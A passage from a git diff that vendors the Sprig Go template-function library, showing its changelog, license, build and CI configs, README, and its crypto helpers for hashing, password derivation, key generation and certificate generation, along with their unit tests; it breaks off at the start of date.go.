+- `floor`, `ceil`, and `round` math functions
+- `toDate` converts a string to a date
+- `nindent` is just like `indent` but also prepends a new line
+- `ago` returns the time from `time.Now`
+
+### Added
+
+- #40: Added basic regex functionality (thanks @alanquillin)
+- #41: Added ceil floor and round functions (thanks @alanquillin)
+- #48: Added toDate function (thanks @andreynering)
+- #50: Added nindent function (thanks @binoculars)
+- #46: Added ago function (thanks @slayer)
+
+### Changed
+
+- #51: Updated godocs to include new string functions (thanks @curtisallen)
+- #49: Added ability to merge multiple dicts (thanks @binoculars)
+
+## Release 2.12.0 (2017-05-17)
+
+- `snakecase`, `camelcase`, and `shuffle` are three new string functions
+- `fail` allows you to bail out of a template render when conditions are not met
+
+## Release 2.11.0 (2017-05-02)
+
+- Added `toJson` and `toPrettyJson`
+- Added `merge`
+- Refactored documentation
+
+## Release 2.10.0 (2017-03-15)
+
+- Added `semver` and `semverCompare` for Semantic Versions
+- `list` replaces `tuple`
+- Fixed issue with `join`
+- Added `first`, `last`, `initial`, `rest`, `prepend`, `append`, `toString`, `toStrings`, `sortAlpha`, `reverse`, `coalesce`, `pluck`, `pick`, `compact`, `keys`, `omit`, `uniq`, `has`, `without`
+
+## Release 2.9.0 (2017-02-23)
+
+- Added `splitList` to split a list
+- Added crypto functions of `genPrivateKey` and `derivePassword`
+
+## Release 2.8.0 (2016-12-21)
+
+- Added access to several path functions (`base`, `dir`, `clean`, `ext`, and `abs`)
+- Added functions for _mutating_ dictionaries (`set`, `unset`, `hasKey`)
+
+## Release 2.7.0 (2016-12-01)
+
+- Added `sha256sum` to generate a hash of an input
+- Added functions to convert a numeric or string to `int`, `int64`, `float64`
+
+## Release 2.6.0 (2016-10-03)
+
+- Added a `uuidv4` template function for generating UUIDs inside of a template.
+
+## Release 2.5.0 (2016-08-19)
+
+- New `trimSuffix`, `trimPrefix`, `hasSuffix`, and `hasPrefix` functions
+- New aliases have been added for a few functions that didn't follow the naming conventions (`trimAll` and `abbrevBoth`)
+- `trimall` and `abbrevboth` (notice the case) are deprecated and will be removed in 3.0.0
+
+## Release 2.4.0 (2016-08-16)
+
+- Adds two functions: `until` and `untilStep`
+
+## Release 2.3.0 (2016-06-21)
+
+- cat: Concatenate strings with whitespace separators.
+- replace: Replace parts of a string: `replace " " "-" "Me First"` renders "Me-First"
+- plural: Format plurals: `len "foo" | plural "one foo" "many foos"` renders "many foos"
+- indent: Indent blocks of text in a way that is sensitive to "\n" characters.
+
+## Release 2.2.0 (2016-04-21)
+
+- Added a `genPrivateKey` function (Thanks @bacongobbler)
+
+## Release 2.1.0 (2016-03-30)
+
+- `default` now prints the default value when it does not receive a value down the pipeline. It is much safer now to do `{{.Foo | default "bar"}}`.
+- Added accessors for "hermetic" functions. These return only functions that, when given the same input, produce the same output.
+
+## Release 2.0.0 (2016-03-29)
+
+Because we switched from `int` to `int64` as the return value for all integer math functions, the library's major version number has been incremented.
+
+- `min` complements `max` (formerly `biggest`)
+- `empty` indicates that a value is the empty value for its type
+- `tuple` creates a tuple inside of a template: `{{$t := tuple "a", "b" "c"}}`
+- `dict` creates a dictionary inside of a template `{{$d := dict "key1" "val1" "key2" "val2"}}`
+- Date formatters have been added for HTML dates (as used in `date` input fields)
+- Integer math functions can convert from a number of types, including `string` (via `strconv.ParseInt`).
+
+## Release 1.2.0 (2016-02-01)
+
+- Added quote and squote
+- Added b32enc and b32dec
+- add now takes varargs
+- biggest now takes varargs
+
+## Release 1.1.0 (2015-12-29)
+
+- Added #4: Added contains function. strings.Contains, but with the arguments
+ switched to simplify common pipelines. (thanks krancour)
+- Added Travis-CI testing support
+
+## Release 1.0.0 (2015-12-23)
+
+- Initial release
diff --git a/vendor/github.com/Masterminds/sprig/LICENSE.txt b/vendor/github.com/Masterminds/sprig/LICENSE.txt
new file mode 100644
index 0000000000..5c95accc2e
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/LICENSE.txt
@@ -0,0 +1,20 @@
+Sprig
+Copyright (C) 2013 Masterminds
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in
+all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
+THE SOFTWARE.
diff --git a/vendor/github.com/Masterminds/sprig/Makefile b/vendor/github.com/Masterminds/sprig/Makefile
new file mode 100644
index 0000000000..63a93fdf79
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/Makefile
@@ -0,0 +1,13 @@
+
+HAS_GLIDE := $(shell command -v glide;)
+
+.PHONY: test
+test:
+ go test -v .
+
+.PHONY: setup
+setup:
+ifndef HAS_GLIDE
+ go get -u github.com/Masterminds/glide
+endif
+ glide install
diff --git a/vendor/github.com/Masterminds/sprig/README.md b/vendor/github.com/Masterminds/sprig/README.md
new file mode 100644
index 0000000000..25bf3d4f4b
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/README.md
@@ -0,0 +1,81 @@
+# Sprig: Template functions for Go templates
+[![Stability: Sustained](https://masterminds.github.io/stability/sustained.svg)](https://masterminds.github.io/stability/sustained.html)
+[![Build Status](https://travis-ci.org/Masterminds/sprig.svg?branch=master)](https://travis-ci.org/Masterminds/sprig)
+
+The Go language comes with a [built-in template
+language](http://golang.org/pkg/text/template/), but not
+very many template functions. This library provides a group of commonly
+used template functions.
+
+It is inspired by the template functions found in
+[Twig](http://twig.sensiolabs.org/documentation) and also in various
+JavaScript libraries, such as [underscore.js](http://underscorejs.org/).
+
+## Usage
+
+Template developers can read the [Sprig function documentation](http://masterminds.github.io/sprig/) to
+learn about the >100 template functions available.
+
+For Go developers wishing to include Sprig as a library in their programs,
+API documentation is available [at GoDoc.org](http://godoc.org/github.com/Masterminds/sprig), but
+read on for standard usage.
+
+### Load the Sprig library
+
+To load the Sprig `FuncMap`:
+
+```go
+import (
+  "github.com/Masterminds/sprig"
+  "html/template"
+)
+
+// This example illustrates that the FuncMap *must* be set before the
+// templates themselves are loaded.
+tpl := template.Must(
+  template.New("base").Funcs(sprig.FuncMap()).ParseGlob("*.html"),
+)
+```
+
+### Call the functions inside of templates
+
+By convention, all functions are lowercase. This seems to follow the Go
+idiom for template functions (as opposed to template methods, which are
+TitleCase).
+
+
+Example:
+
+```
+{{ "hello!" | upper | repeat 5 }}
+```
+
+Produces:
+
+```
+HELLO!HELLO!HELLO!HELLO!HELLO!
+```
+
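+Putting the pieces together, a minimal self-contained program (a sketch using
+`text/template` and Sprig's `TxtFuncMap`) might look like this:
+
+```go
+package main
+
+import (
+  "os"
+  "text/template"
+
+  "github.com/Masterminds/sprig"
+)
+
+func main() {
+  // Register Sprig's functions before parsing the template.
+  tpl := template.Must(
+    template.New("demo").Funcs(sprig.TxtFuncMap()).Parse(`{{ "hello!" | upper | repeat 5 }}`),
+  )
+  // Writes: HELLO!HELLO!HELLO!HELLO!HELLO!
+  if err := tpl.Execute(os.Stdout, nil); err != nil {
+    panic(err)
+  }
+}
+```
+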
+## Principles
+
+The following principles were used in deciding on which functions to add, and
+determining how to implement them.
+
+- Template functions should be used to build layout. Therefore, the following
+ types of operations are within the domain of template functions:
+ - Formatting
+ - Layout
+ - Simple type conversions
+ - Utilities that assist in handling common formatting and layout needs (e.g. arithmetic)
+- Template functions should not return errors unless there is no way to print
+  a sensible value. For example, converting a string to an integer should not
+  produce an error if conversion fails. Instead, it should return a default
+  value that can be displayed.
+- Simple math is necessary for grid layouts, pagers, and so on. Complex math
+ (anything other than arithmetic) should be done outside of templates.
+- Template functions only deal with the data passed into them. They never retrieve
+ data from a source.
+- Finally, do not override core Go template functions.
diff --git a/vendor/github.com/Masterminds/sprig/appveyor.yml b/vendor/github.com/Masterminds/sprig/appveyor.yml
new file mode 100644
index 0000000000..d545a987a3
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/appveyor.yml
@@ -0,0 +1,26 @@
+
+version: build-{build}.{branch}
+
+clone_folder: C:\gopath\src\github.com\Masterminds\sprig
+shallow_clone: true
+
+environment:
+ GOPATH: C:\gopath
+
+platform:
+ - x64
+
+install:
+ - go get -u github.com/Masterminds/glide
+ - set PATH=%GOPATH%\bin;%PATH%
+ - go version
+ - go env
+
+build_script:
+ - glide install
+ - go install ./...
+
+test_script:
+ - go test -v
+
+deploy: off
diff --git a/vendor/github.com/Masterminds/sprig/crypto.go b/vendor/github.com/Masterminds/sprig/crypto.go
new file mode 100644
index 0000000000..a91c4a7045
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/crypto.go
@@ -0,0 +1,430 @@
+package sprig
+
+import (
+ "bytes"
+ "crypto/dsa"
+ "crypto/ecdsa"
+ "crypto/elliptic"
+ "crypto/hmac"
+ "crypto/rand"
+ "crypto/rsa"
+ "crypto/sha1"
+ "crypto/sha256"
+ "crypto/x509"
+ "crypto/x509/pkix"
+ "encoding/asn1"
+ "encoding/base64"
+ "encoding/binary"
+ "encoding/hex"
+ "encoding/pem"
+ "errors"
+ "fmt"
+ "math/big"
+ "net"
+ "time"
+
+ "github.com/google/uuid"
+ "golang.org/x/crypto/scrypt"
+)
+
+func sha256sum(input string) string {
+ hash := sha256.Sum256([]byte(input))
+ return hex.EncodeToString(hash[:])
+}
+
+func sha1sum(input string) string {
+ hash := sha1.Sum([]byte(input))
+ return hex.EncodeToString(hash[:])
+}
+
+// uuidv4 provides a safe and secure UUID v4 implementation
+func uuidv4() string {
+ return fmt.Sprintf("%s", uuid.New())
+}
+
+var master_password_seed = "com.lyndir.masterpassword"
+
+var password_type_templates = map[string][][]byte{
+ "maximum": {[]byte("anoxxxxxxxxxxxxxxxxx"), []byte("axxxxxxxxxxxxxxxxxno")},
+ "long": {[]byte("CvcvnoCvcvCvcv"), []byte("CvcvCvcvnoCvcv"), []byte("CvcvCvcvCvcvno"), []byte("CvccnoCvcvCvcv"), []byte("CvccCvcvnoCvcv"),
+ []byte("CvccCvcvCvcvno"), []byte("CvcvnoCvccCvcv"), []byte("CvcvCvccnoCvcv"), []byte("CvcvCvccCvcvno"), []byte("CvcvnoCvcvCvcc"),
+ []byte("CvcvCvcvnoCvcc"), []byte("CvcvCvcvCvccno"), []byte("CvccnoCvccCvcv"), []byte("CvccCvccnoCvcv"), []byte("CvccCvccCvcvno"),
+ []byte("CvcvnoCvccCvcc"), []byte("CvcvCvccnoCvcc"), []byte("CvcvCvccCvccno"), []byte("CvccnoCvcvCvcc"), []byte("CvccCvcvnoCvcc"),
+ []byte("CvccCvcvCvccno")},
+ "medium": {[]byte("CvcnoCvc"), []byte("CvcCvcno")},
+ "short": {[]byte("Cvcn")},
+ "basic": {[]byte("aaanaaan"), []byte("aannaaan"), []byte("aaannaaa")},
+ "pin": {[]byte("nnnn")},
+}
+
+var template_characters = map[byte]string{
+ 'V': "AEIOU",
+ 'C': "BCDFGHJKLMNPQRSTVWXYZ",
+ 'v': "aeiou",
+ 'c': "bcdfghjklmnpqrstvwxyz",
+ 'A': "AEIOUBCDFGHJKLMNPQRSTVWXYZ",
+ 'a': "AEIOUaeiouBCDFGHJKLMNPQRSTVWXYZbcdfghjklmnpqrstvwxyz",
+ 'n': "0123456789",
+ 'o': "@&%?,=[]_:-+*$#!'^~;()/.",
+ 'x': "AEIOUaeiouBCDFGHJKLMNPQRSTVWXYZbcdfghjklmnpqrstvwxyz0123456789!@#$%^&*()",
+}
+
+func derivePassword(counter uint32, password_type, password, user, site string) string {
+ var templates = password_type_templates[password_type]
+ if templates == nil {
+ return fmt.Sprintf("cannot find password template %s", password_type)
+ }
+
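+ // Build the scrypt salt: the master-password seed followed by the length-prefixed user name.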
+ var buffer bytes.Buffer
+ buffer.WriteString(master_password_seed)
+ binary.Write(&buffer, binary.BigEndian, uint32(len(user)))
+ buffer.WriteString(user)
+
+ salt := buffer.Bytes()
+ key, err := scrypt.Key([]byte(password), salt, 32768, 8, 2, 64)
+ if err != nil {
+ return fmt.Sprintf("failed to derive password: %s", err)
+ }
+
+ buffer.Truncate(len(master_password_seed))
+ binary.Write(&buffer, binary.BigEndian, uint32(len(site)))
+ buffer.WriteString(site)
+ binary.Write(&buffer, binary.BigEndian, counter)
+
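+ // HMAC the length-prefixed site name and counter with the derived key; the digest drives template and character selection below.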
+ var hmacv = hmac.New(sha256.New, key)
+ hmacv.Write(buffer.Bytes())
+ var seed = hmacv.Sum(nil)
+ var temp = templates[int(seed[0])%len(templates)]
+
+ buffer.Truncate(0)
+ for i, element := range temp {
+ pass_chars := template_characters[element]
+ pass_char := pass_chars[int(seed[i+1])%len(pass_chars)]
+ buffer.WriteByte(pass_char)
+ }
+
+ return buffer.String()
+}
+
+func generatePrivateKey(typ string) string {
+ var priv interface{}
+ var err error
+ switch typ {
+ case "", "rsa":
+ // good enough for government work
+ priv, err = rsa.GenerateKey(rand.Reader, 4096)
+ case "dsa":
+ key := new(dsa.PrivateKey)
+ // again, good enough for government work
+ if err = dsa.GenerateParameters(&key.Parameters, rand.Reader, dsa.L2048N256); err != nil {
+ return fmt.Sprintf("failed to generate dsa params: %s", err)
+ }
+ err = dsa.GenerateKey(key, rand.Reader)
+ priv = key
+ case "ecdsa":
+ // again, good enough for government work
+ priv, err = ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
+ default:
+ return "Unknown type " + typ
+ }
+ if err != nil {
+ return fmt.Sprintf("failed to generate private key: %s", err)
+ }
+
+ return string(pem.EncodeToMemory(pemBlockForKey(priv)))
+}
+
+type DSAKeyFormat struct {
+ Version int
+ P, Q, G, Y, X *big.Int
+}
+
+func pemBlockForKey(priv interface{}) *pem.Block {
+ switch k := priv.(type) {
+ case *rsa.PrivateKey:
+ return &pem.Block{Type: "RSA PRIVATE KEY", Bytes: x509.MarshalPKCS1PrivateKey(k)}
+ case *dsa.PrivateKey:
+ val := DSAKeyFormat{
+ P: k.P, Q: k.Q, G: k.G,
+ Y: k.Y, X: k.X,
+ }
+ bytes, _ := asn1.Marshal(val)
+ return &pem.Block{Type: "DSA PRIVATE KEY", Bytes: bytes}
+ case *ecdsa.PrivateKey:
+ b, _ := x509.MarshalECPrivateKey(k)
+ return &pem.Block{Type: "EC PRIVATE KEY", Bytes: b}
+ default:
+ return nil
+ }
+}
+
+type certificate struct {
+ Cert string
+ Key string
+}
+
+func buildCustomCertificate(b64cert string, b64key string) (certificate, error) {
+ crt := certificate{}
+
+ cert, err := base64.StdEncoding.DecodeString(b64cert)
+ if err != nil {
+ return crt, errors.New("unable to decode base64 certificate")
+ }
+
+ key, err := base64.StdEncoding.DecodeString(b64key)
+ if err != nil {
+ return crt, errors.New("unable to decode base64 private key")
+ }
+
+ decodedCert, _ := pem.Decode(cert)
+ if decodedCert == nil {
+ return crt, errors.New("unable to decode certificate")
+ }
+ _, err = x509.ParseCertificate(decodedCert.Bytes)
+ if err != nil {
+ return crt, fmt.Errorf(
+ "error parsing certificate: decodedCert.Bytes: %s",
+ err,
+ )
+ }
+
+ decodedKey, _ := pem.Decode(key)
+ if decodedKey == nil {
+ return crt, errors.New("unable to decode key")
+ }
+ _, err = x509.ParsePKCS1PrivateKey(decodedKey.Bytes)
+ if err != nil {
+ return crt, fmt.Errorf(
+ "error parsing prive key: decodedKey.Bytes: %s",
+ err,
+ )
+ }
+
+ crt.Cert = string(cert)
+ crt.Key = string(key)
+
+ return crt, nil
+}
+
+func generateCertificateAuthority(
+ cn string,
+ daysValid int,
+) (certificate, error) {
+ ca := certificate{}
+
+ template, err := getBaseCertTemplate(cn, nil, nil, daysValid)
+ if err != nil {
+ return ca, err
+ }
+ // Override KeyUsage and IsCA
+ template.KeyUsage = x509.KeyUsageKeyEncipherment |
+ x509.KeyUsageDigitalSignature |
+ x509.KeyUsageCertSign
+ template.IsCA = true
+
+ priv, err := rsa.GenerateKey(rand.Reader, 2048)
+ if err != nil {
+ return ca, fmt.Errorf("error generating rsa key: %s", err)
+ }
+
+ ca.Cert, ca.Key, err = getCertAndKey(template, priv, template, priv)
+ if err != nil {
+ return ca, err
+ }
+
+ return ca, nil
+}
+
+func generateSelfSignedCertificate(
+ cn string,
+ ips []interface{},
+ alternateDNS []interface{},
+ daysValid int,
+) (certificate, error) {
+ cert := certificate{}
+
+ template, err := getBaseCertTemplate(cn, ips, alternateDNS, daysValid)
+ if err != nil {
+ return cert, err
+ }
+
+ priv, err := rsa.GenerateKey(rand.Reader, 2048)
+ if err != nil {
+ return cert, fmt.Errorf("error generating rsa key: %s", err)
+ }
+
+ cert.Cert, cert.Key, err = getCertAndKey(template, priv, template, priv)
+ if err != nil {
+ return cert, err
+ }
+
+ return cert, nil
+}
+
+func generateSignedCertificate(
+ cn string,
+ ips []interface{},
+ alternateDNS []interface{},
+ daysValid int,
+ ca certificate,
+) (certificate, error) {
+ cert := certificate{}
+
+ decodedSignerCert, _ := pem.Decode([]byte(ca.Cert))
+ if decodedSignerCert == nil {
+ return cert, errors.New("unable to decode certificate")
+ }
+ signerCert, err := x509.ParseCertificate(decodedSignerCert.Bytes)
+ if err != nil {
+ return cert, fmt.Errorf(
+ "error parsing certificate: decodedSignerCert.Bytes: %s",
+ err,
+ )
+ }
+ decodedSignerKey, _ := pem.Decode([]byte(ca.Key))
+ if decodedSignerKey == nil {
+ return cert, errors.New("unable to decode key")
+ }
+ signerKey, err := x509.ParsePKCS1PrivateKey(decodedSignerKey.Bytes)
+ if err != nil {
+ return cert, fmt.Errorf(
+ "error parsing prive key: decodedSignerKey.Bytes: %s",
+ err,
+ )
+ }
+
+ template, err := getBaseCertTemplate(cn, ips, alternateDNS, daysValid)
+ if err != nil {
+ return cert, err
+ }
+
+ priv, err := rsa.GenerateKey(rand.Reader, 2048)
+ if err != nil {
+ return cert, fmt.Errorf("error generating rsa key: %s", err)
+ }
+
+ cert.Cert, cert.Key, err = getCertAndKey(
+ template,
+ priv,
+ signerCert,
+ signerKey,
+ )
+ if err != nil {
+ return cert, err
+ }
+
+ return cert, nil
+}
+
+func getCertAndKey(
+ template *x509.Certificate,
+ signeeKey *rsa.PrivateKey,
+ parent *x509.Certificate,
+ signingKey *rsa.PrivateKey,
+) (string, string, error) {
+ derBytes, err := x509.CreateCertificate(
+ rand.Reader,
+ template,
+ parent,
+ &signeeKey.PublicKey,
+ signingKey,
+ )
+ if err != nil {
+ return "", "", fmt.Errorf("error creating certificate: %s", err)
+ }
+
+ certBuffer := bytes.Buffer{}
+ if err := pem.Encode(
+ &certBuffer,
+ &pem.Block{Type: "CERTIFICATE", Bytes: derBytes},
+ ); err != nil {
+ return "", "", fmt.Errorf("error pem-encoding certificate: %s", err)
+ }
+
+ keyBuffer := bytes.Buffer{}
+ if err := pem.Encode(
+ &keyBuffer,
+ &pem.Block{
+ Type: "RSA PRIVATE KEY",
+ Bytes: x509.MarshalPKCS1PrivateKey(signeeKey),
+ },
+ ); err != nil {
+ return "", "", fmt.Errorf("error pem-encoding key: %s", err)
+ }
+
+ return string(certBuffer.Bytes()), string(keyBuffer.Bytes()), nil
+}
+
+func getBaseCertTemplate(
+ cn string,
+ ips []interface{},
+ alternateDNS []interface{},
+ daysValid int,
+) (*x509.Certificate, error) {
+ ipAddresses, err := getNetIPs(ips)
+ if err != nil {
+ return nil, err
+ }
+ dnsNames, err := getAlternateDNSStrs(alternateDNS)
+ if err != nil {
+ return nil, err
+ }
+ return &x509.Certificate{
+ SerialNumber: big.NewInt(1),
+ Subject: pkix.Name{
+ CommonName: cn,
+ },
+ IPAddresses: ipAddresses,
+ DNSNames: dnsNames,
+ NotBefore: time.Now(),
+ NotAfter: time.Now().Add(time.Hour * 24 * time.Duration(daysValid)),
+ KeyUsage: x509.KeyUsageKeyEncipherment | x509.KeyUsageDigitalSignature,
+ ExtKeyUsage: []x509.ExtKeyUsage{
+ x509.ExtKeyUsageServerAuth,
+ x509.ExtKeyUsageClientAuth,
+ },
+ BasicConstraintsValid: true,
+ }, nil
+}
+
+func getNetIPs(ips []interface{}) ([]net.IP, error) {
+ if ips == nil {
+ return []net.IP{}, nil
+ }
+ var ipStr string
+ var ok bool
+ var netIP net.IP
+ netIPs := make([]net.IP, len(ips))
+ for i, ip := range ips {
+ ipStr, ok = ip.(string)
+ if !ok {
+ return nil, fmt.Errorf("error parsing ip: %v is not a string", ip)
+ }
+ netIP = net.ParseIP(ipStr)
+ if netIP == nil {
+ return nil, fmt.Errorf("error parsing ip: %s", ipStr)
+ }
+ netIPs[i] = netIP
+ }
+ return netIPs, nil
+}
+
+func getAlternateDNSStrs(alternateDNS []interface{}) ([]string, error) {
+ if alternateDNS == nil {
+ return []string{}, nil
+ }
+ var dnsStr string
+ var ok bool
+ alternateDNSStrs := make([]string, len(alternateDNS))
+ for i, dns := range alternateDNS {
+ dnsStr, ok = dns.(string)
+ if !ok {
+ return nil, fmt.Errorf(
+ "error processing alternate dns name: %v is not a string",
+ dns,
+ )
+ }
+ alternateDNSStrs[i] = dnsStr
+ }
+ return alternateDNSStrs, nil
+}
diff --git a/vendor/github.com/Masterminds/sprig/crypto_test.go b/vendor/github.com/Masterminds/sprig/crypto_test.go
new file mode 100644
index 0000000000..77b3e3fb2c
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/crypto_test.go
@@ -0,0 +1,259 @@
+package sprig
+
+import (
+ "crypto/x509"
+ "encoding/base64"
+ "encoding/pem"
+ "fmt"
+ "strings"
+ "testing"
+
+ "github.com/stretchr/testify/assert"
+)
+
+const (
+ beginCertificate = "-----BEGIN CERTIFICATE-----"
+ endCertificate = "-----END CERTIFICATE-----"
+)
+
+func TestSha256Sum(t *testing.T) {
+ tpl := `{{"abc" | sha256sum}}`
+ if err := runt(tpl, "ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad"); err != nil {
+ t.Error(err)
+ }
+}
+func TestSha1Sum(t *testing.T) {
+ tpl := `{{"abc" | sha1sum}}`
+ if err := runt(tpl, "a9993e364706816aba3e25717850c26c9cd0d89d"); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestDerivePassword(t *testing.T) {
+ expectations := map[string]string{
+ `{{derivePassword 1 "long" "password" "user" "example.com"}}`: "ZedaFaxcZaso9*",
+ `{{derivePassword 2 "long" "password" "user" "example.com"}}`: "Fovi2@JifpTupx",
+ `{{derivePassword 1 "maximum" "password" "user" "example.com"}}`: "pf4zS1LjCg&LjhsZ7T2~",
+ `{{derivePassword 1 "medium" "password" "user" "example.com"}}`: "ZedJuz8$",
+ `{{derivePassword 1 "basic" "password" "user" "example.com"}}`: "pIS54PLs",
+ `{{derivePassword 1 "short" "password" "user" "example.com"}}`: "Zed5",
+ `{{derivePassword 1 "pin" "password" "user" "example.com"}}`: "6685",
+ }
+
+ for tpl, result := range expectations {
+ out, err := runRaw(tpl, nil)
+ if err != nil {
+ t.Error(err)
+ }
+ if 0 != strings.Compare(out, result) {
+ t.Error("Generated password does not match for", tpl)
+ }
+ }
+}
+
+// NOTE(bacongobbler): this test is really _slow_ because of how long it takes to compute
+// and generate a new crypto key.
+func TestGenPrivateKey(t *testing.T) {
+ // test that calling by default generates an RSA private key
+ tpl := `{{genPrivateKey ""}}`
+ out, err := runRaw(tpl, nil)
+ if err != nil {
+ t.Error(err)
+ }
+ if !strings.Contains(out, "RSA PRIVATE KEY") {
+ t.Error("Expected RSA PRIVATE KEY")
+ }
+ // test all acceptable arguments
+ tpl = `{{genPrivateKey "rsa"}}`
+ out, err = runRaw(tpl, nil)
+ if err != nil {
+ t.Error(err)
+ }
+ if !strings.Contains(out, "RSA PRIVATE KEY") {
+ t.Error("Expected RSA PRIVATE KEY")
+ }
+ tpl = `{{genPrivateKey "dsa"}}`
+ out, err = runRaw(tpl, nil)
+ if err != nil {
+ t.Error(err)
+ }
+ if !strings.Contains(out, "DSA PRIVATE KEY") {
+ t.Error("Expected DSA PRIVATE KEY")
+ }
+ tpl = `{{genPrivateKey "ecdsa"}}`
+ out, err = runRaw(tpl, nil)
+ if err != nil {
+ t.Error(err)
+ }
+ if !strings.Contains(out, "EC PRIVATE KEY") {
+ t.Error("Expected EC PRIVATE KEY")
+ }
+ // test bad
+ tpl = `{{genPrivateKey "bad"}}`
+ out, err = runRaw(tpl, nil)
+ if err != nil {
+ t.Error(err)
+ }
+ if out != "Unknown type bad" {
+ t.Error("Expected type 'bad' to be an unknown crypto algorithm")
+ }
+ // ensure that we can base64 encode the string
+ tpl = `{{genPrivateKey "rsa" | b64enc}}`
+ out, err = runRaw(tpl, nil)
+ if err != nil {
+ t.Error(err)
+ }
+}
+
+func TestUUIDGeneration(t *testing.T) {
+ tpl := `{{uuidv4}}`
+ out, err := runRaw(tpl, nil)
+ if err != nil {
+ t.Error(err)
+ }
+
+ if len(out) != 36 {
+ t.Error("Expected UUID of length 36")
+ }
+
+ out2, err := runRaw(tpl, nil)
+ if err != nil {
+ t.Error(err)
+ }
+
+ if out == out2 {
+ t.Error("Expected subsequent UUID generations to be different")
+ }
+}
+
+func TestBuildCustomCert(t *testing.T) {
+ ca, _ := generateCertificateAuthority("example.com", 365)
+ tpl := fmt.Sprintf(
+ `{{- $ca := buildCustomCert "%s" "%s"}}
+{{- $ca.Cert }}`,
+ base64.StdEncoding.EncodeToString([]byte(ca.Cert)),
+ base64.StdEncoding.EncodeToString([]byte(ca.Key)),
+ )
+ out, err := runRaw(tpl, nil)
+ if err != nil {
+ t.Error(err)
+ }
+
+ tpl2 := fmt.Sprintf(
+ `{{- $ca := buildCustomCert "%s" "%s"}}
+{{- $ca.Cert }}`,
+ base64.StdEncoding.EncodeToString([]byte("fail")),
+ base64.StdEncoding.EncodeToString([]byte(ca.Key)),
+ )
+ out2, _ := runRaw(tpl2, nil)
+
+ assert.Equal(t, out, ca.Cert)
+ assert.NotEqual(t, out2, ca.Cert)
+}
+
+func TestGenCA(t *testing.T) {
+ const cn = "foo-ca"
+
+ tpl := fmt.Sprintf(
+ `{{- $ca := genCA "%s" 365 }}
+{{ $ca.Cert }}
+`,
+ cn,
+ )
+ out, err := runRaw(tpl, nil)
+ if err != nil {
+ t.Error(err)
+ }
+ assert.Contains(t, out, beginCertificate)
+ assert.Contains(t, out, endCertificate)
+
+ decodedCert, _ := pem.Decode([]byte(out))
+ assert.Nil(t, err)
+ cert, err := x509.ParseCertificate(decodedCert.Bytes)
+ assert.Nil(t, err)
+
+ assert.Equal(t, cn, cert.Subject.CommonName)
+ assert.True(t, cert.IsCA)
+}
+
+func TestGenSelfSignedCert(t *testing.T) {
+ const (
+ cn = "foo.com"
+ ip1 = "10.0.0.1"
+ ip2 = "10.0.0.2"
+ dns1 = "bar.com"
+ dns2 = "bat.com"
+ )
+
+ tpl := fmt.Sprintf(
+ `{{- $cert := genSelfSignedCert "%s" (list "%s" "%s") (list "%s" "%s") 365 }}
+{{ $cert.Cert }}`,
+ cn,
+ ip1,
+ ip2,
+ dns1,
+ dns2,
+ )
+
+ out, err := runRaw(tpl, nil)
+ if err != nil {
+ t.Error(err)
+ }
+ assert.Contains(t, out, beginCertificate)
+ assert.Contains(t, out, endCertificate)
+
+ decodedCert, _ := pem.Decode([]byte(out))
+ assert.Nil(t, err)
+ cert, err := x509.ParseCertificate(decodedCert.Bytes)
+ assert.Nil(t, err)
+
+ assert.Equal(t, cn, cert.Subject.CommonName)
+ assert.Equal(t, 2, len(cert.IPAddresses))
+ assert.Equal(t, ip1, cert.IPAddresses[0].String())
+ assert.Equal(t, ip2, cert.IPAddresses[1].String())
+ assert.Contains(t, cert.DNSNames, dns1)
+ assert.Contains(t, cert.DNSNames, dns2)
+ assert.False(t, cert.IsCA)
+}
+
+func TestGenSignedCert(t *testing.T) {
+ const (
+ cn = "foo.com"
+ ip1 = "10.0.0.1"
+ ip2 = "10.0.0.2"
+ dns1 = "bar.com"
+ dns2 = "bat.com"
+ )
+
+ tpl := fmt.Sprintf(
+ `{{- $ca := genCA "foo" 365 }}
+{{- $cert := genSignedCert "%s" (list "%s" "%s") (list "%s" "%s") 365 $ca }}
+{{ $cert.Cert }}
+`,
+ cn,
+ ip1,
+ ip2,
+ dns1,
+ dns2,
+ )
+ out, err := runRaw(tpl, nil)
+ if err != nil {
+ t.Error(err)
+ }
+
+ assert.Contains(t, out, beginCertificate)
+ assert.Contains(t, out, endCertificate)
+
+ decodedCert, _ := pem.Decode([]byte(out))
+ assert.Nil(t, err)
+ cert, err := x509.ParseCertificate(decodedCert.Bytes)
+ assert.Nil(t, err)
+
+ assert.Equal(t, cn, cert.Subject.CommonName)
+ assert.Equal(t, 2, len(cert.IPAddresses))
+ assert.Equal(t, ip1, cert.IPAddresses[0].String())
+ assert.Equal(t, ip2, cert.IPAddresses[1].String())
+ assert.Contains(t, cert.DNSNames, dns1)
+ assert.Contains(t, cert.DNSNames, dns2)
+ assert.False(t, cert.IsCA)
+}
diff --git a/vendor/github.com/Masterminds/sprig/date.go b/vendor/github.com/Masterminds/sprig/date.go
new file mode 100644
index 0000000000..1c2c3653c8
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/date.go
@@ -0,0 +1,76 @@
+package sprig
+
+import (
+ "time"
+)
+
